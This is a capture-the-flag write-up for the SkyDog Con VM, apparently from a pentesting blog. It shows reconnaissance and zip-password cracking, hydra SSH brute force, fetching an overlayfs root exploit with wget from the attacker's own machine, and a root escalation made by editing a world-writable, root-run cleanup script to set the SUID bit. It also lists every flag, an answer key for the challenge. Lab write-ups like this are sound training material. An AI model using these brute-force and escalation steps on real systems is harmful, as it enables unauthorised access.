30 March 2023

Pentesting Fun Stuff


SkyDog Con CTF – The Legend Begins

Over but not forgotten.

Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

Enumeration

nmap -p- -T4 -sV -v 192.168.2.18

[screenshot: nmap output]
Looks like there is a web server running and the SSH port is open.
Let's start with the web server first.
Looking at the webpage of 192.168.2.18 there is only a picture of SkyDog. Would that be the first flag (A Picture is Worth a Thousand Words)? I saved the picture and checked its EXIF data.
[screenshot: EXIF data of the picture]
Looks like I found the first flag. On to the next one. When do Androids Learn to Walk? A reference to robots.txt?

dirb http://192.168.2.18

[screenshot: dirb output]
http://192.168.2.18/robots.txt >> flag{cd4f10fcba234f0e8b2f60a490c306e6}
Got flag number 2 and a whole list of directories to explore. Maybe hint number 3 gives direction? Who Can You Trust? After I ran nikto, the directory /Setec/ caught my attention.
It held a picture with the text 'too many secrets' from the movie 'Sneakers'.
Of course: 'Setec Astronomy' is an anagram of 'too many secrets'. This VM was made by a movie buff LOL.
[screenshot: setec.JPG]
Because there was another picture, I started by checking the EXIF data. Nothing. Then I thought, there are too many secrets... so let's try steghide. After several unsuccessful attempts, I gave up on the picture and looked at the page itself. Inside the source there was a Google tracking script. Not really useful. But there was an odd thing about the script itself: it looked like the script was signed by NSA agent Abbott AKA Darth Vader. Another movie reference, because James Earl Jones played NSA Agent Bernard Abbott in the movie Sneakers and he also provided the voice of Darth Vader. I had been so focused on the picture itself that I hadn't noticed the picture resided in the directory /Astronomy/. Inside this directory there was a zip file called Whistler.zip.
Having the wiki page of Sneakers still open, it was soon clear that the filename itself was another reference to the movie. Irwin "Whistler" Emery was a blind phone phreak.
Let's unpack the zip file. Password protected. Bummer. Let's try some words from the movie itself. No luck. Then it's time for some brute force. Let's load the file into fcrackzip. I chose the rockyou wordlist and voila. Got the password.
Inside the zip file was the third flag (flag{1871a3c1da602bf471d3d76cc60cdb9b}) and a file called 'QuesttoFindCosmo'.

[screenshot: contents of QuesttoFindCosmo]

The clue inside the textfile was ‘Time to break out those binoculars and start doing some OSINT’.
Because this CTF was filled with references from the movie ‘Sneakers’, I assumed this was another one. In the filename was the word Cosmo. After checking wiki again it was clear that Cosmo was a character from Sneakers played by Ben Kingsley. There were a few words that I could use in a Google search.

“Cosmo” AND “Ben Kingsley” AND “binoculars”

The result was a site with the movie script (http://www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt). Searching for the word 'binoculars' gave 4 hits. One of them was in a piece of text containing the words "binoculars", "flag", "Cosmo"... and "PlayTronics". This last word was important in the text, so hopefully it's also important in finding the next flag.
I pulled the words from the movie script into a word list with:

cewl --write sneakers.lst -m 3 http://www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt

Then sorted the list and removed doubles.

sort sneakers.lst | uniq > sneakers_uniq.lst

Lastly I ran dirb with the new list.
[screenshot: dirb output with the sneakers word list]
PlayTronics! Yes! Let's check it out.
And we have another flag (flag{c07908a705c22922e6d416e0e1107d99}).

Wireshark

Next to the flag there was also a pcap file named companytraffic.
Let's fire up Wireshark and analyze the pcap file.
Inside the pcap file there is an audio file. After carving it out and playing it, it turned out to be another reference to the movie 'Sneakers'. This time it's the part where Werner Brandes identifies himself with the phrase: "Hi, my name is Werner Brandes. My voice is my passport. Verify me." But how does this help me find the next clue?
I'm stumped. I scoured the internet for a clue. I kept reading the part of the script concerning the audio message, but nothing. To avoid tunnel vision I started to look at other things. I went back to the hashes used in the flags and noticed they were MD5 hashes. Why not check whether they're known passwords?
[screenshot: CrackStation result]
The hash of the last recovered flag cracked to 'leroybrown'. Back to the movie script. The name Leroy Brown comes up in the form of a song, just before the part with the text from the carved audio file. Coincidence?
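The check described above, written out as an added example (not code from the original post): pull the 32-hex MD5 digest out of each flag{...} string and compare it against the MD5 of every word in a candidate list, the way CrackStation or a cewl-built word list would. The candidate words below are constructed for the example; the post only tells us that one flag cracks to 'leroybrown'.

```python
import hashlib
import re

# Flags in this CTF have the form flag{<32 hex chars>}, i.e. flag{MD5 hex digest}.
FLAG_RE = re.compile(r"flag\{([0-9a-f]{32})\}")

# The six flags recovered in the writeup.
PAGE_FLAGS = [
    "flag{abc40a2d4e023b42bd1ff04891549ae2}",
    "flag{cd4f10fcba234f0e8b2f60a490c306e6}",
    "flag{1871a3c1da602bf471d3d76cc60cdb9b}",
    "flag{c07908a705c22922e6d416e0e1107d99}",
    "flag{82ce8d8f5745ff6849fa7af1473c9b35}",
    "flag{b70b205c96270be6ced772112e7dd03f}",
]

# Constructed candidate words standing in for a word list built from the movie
# script (the writeup used cewl for that); only 'leroybrown' is known to crack.
CANDIDATE_WORDS = ["sneakers", "cosmo", "whistler", "playtronics", "setec",
                   "leroybrown", "brandes", "binoculars"]


def md5_hex(word: str) -> str:
    """Hex MD5 digest of a UTF-8 encoded word (unsalted, as the flags are)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def extract_hashes(flags):
    """Return the digests embedded in well-formed flag{...} strings; skip malformed ones."""
    digests = []
    for flag in flags:
        m = FLAG_RE.fullmatch(flag.strip())
        if m:
            digests.append(m.group(1))
    return digests


def match_flag_hashes(flags, words):
    """Map each flag digest to the candidate word (or case variant) that hashes to it."""
    wanted = set(extract_hashes(flags))
    # Hash the word list once, including simple case variants, then look the
    # flag digests up in the table: O(words + flags) instead of O(words * flags).
    table = {}
    for w in words:
        for variant in (w, w.lower(), w.upper(), w.capitalize()):
            table.setdefault(md5_hex(variant), variant)
    return {d: table[d] for d in wanted if d in table}


if __name__ == "__main__":
    for digest, word in match_flag_hashes(PAGE_FLAGS, CANDIDATE_WORDS).items():
        print(f"flag{{{digest}}} is MD5('{word}')")
```

The same lookup is what makes an unsalted MD5 of a dictionary word worthless as a secret: anyone with the word list recovers it in one pass.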

SSH

I hadn't tried SSH yet because I had no username or password. I tried:
leroy:brown
leroybrown:My voice is my passport. Verify me.
leroybrown:Hi, my name is Werner Brandes. My voice is my passport. Verify me.
And a whole lot of other combinations, but nothing.
Time for hydra. I made a word list from the movie script and used it with hydra.

hydra -v -L wordlist.txt -P wordlist.txt 192.168.2.18 ssh

[screenshot: hydra output]
Finally! Let's log in.
[screenshot: SSH login]

uname -a

[screenshot: uname output]

ls
cat flag.txt

flag{82ce8d8f5745ff6849fa7af1473c9b35}
Time for the final flag.
Looks like the machine runs on Ubuntu 14.04. Time to get root.
I’m going for the ‘overlayfs’ Local Root Exploit (https://www.exploit-db.com/exploits/39166/).

wget http://192.168.2.9/overlayfs.c
gcc overlayfs.c -o overlayfs

The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

Crap! No gcc.
Let’s look around more.

cat /etc/passwd

[screenshot: /etc/passwd]
Looks like there is another user named 'nemo'.

groups nemo

[screenshot: groups output]
And 'nemo' is part of the sudo group.
To get root I need a file that gets run by root. So I’m going to look for world writable files.

find / -perm -0002 -type f -not -path "/proc*" -exec ls -la {} \; 2>/dev/null

[screenshot: find output]
sanitizer.py... what does it do?

cat /lib/log/sanitizer.py

[screenshot: sanitizer.py]
Looks like this script cleans up the tmp folder.
Let's alter it so that it sets the SUID bit.
[screenshot: editing sanitizer.py in nano]
[screenshot: root]
I'm in the root group. Now let's take a look in the root folder.
[screenshot: final flag]
flag{b70b205c96270be6ced772112e7dd03f}
To get the final piece...

http://192.168.2.18/CongratulationsYouDidIt/

[screenshot: CongratulationsYouDidIt page]

Flags

The six flags are in the form of flag{MD5 Hash}, such as flag{1a79a4d60de6718e8e5b326e338ae533}
Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
flag{abc40a2d4e023b42bd1ff04891549ae2}
Flag #2 When do Androids Learn to Walk?
flag{cd4f10fcba234f0e8b2f60a490c306e6}
Flag #3 Who Can You Trust?
flag{1871a3c1da602bf471d3d76cc60cdb9b}
Flag #4 Who Doesn’t Love a Good Cocktail Party?
flag{c07908a705c22922e6d416e0e1107d99}
Flag #5 Another Day at the Office
flag{82ce8d8f5745ff6849fa7af1473c9b35}
Flag #6 Little Black Box
flag{b70b205c96270be6ced772112e7dd03f}
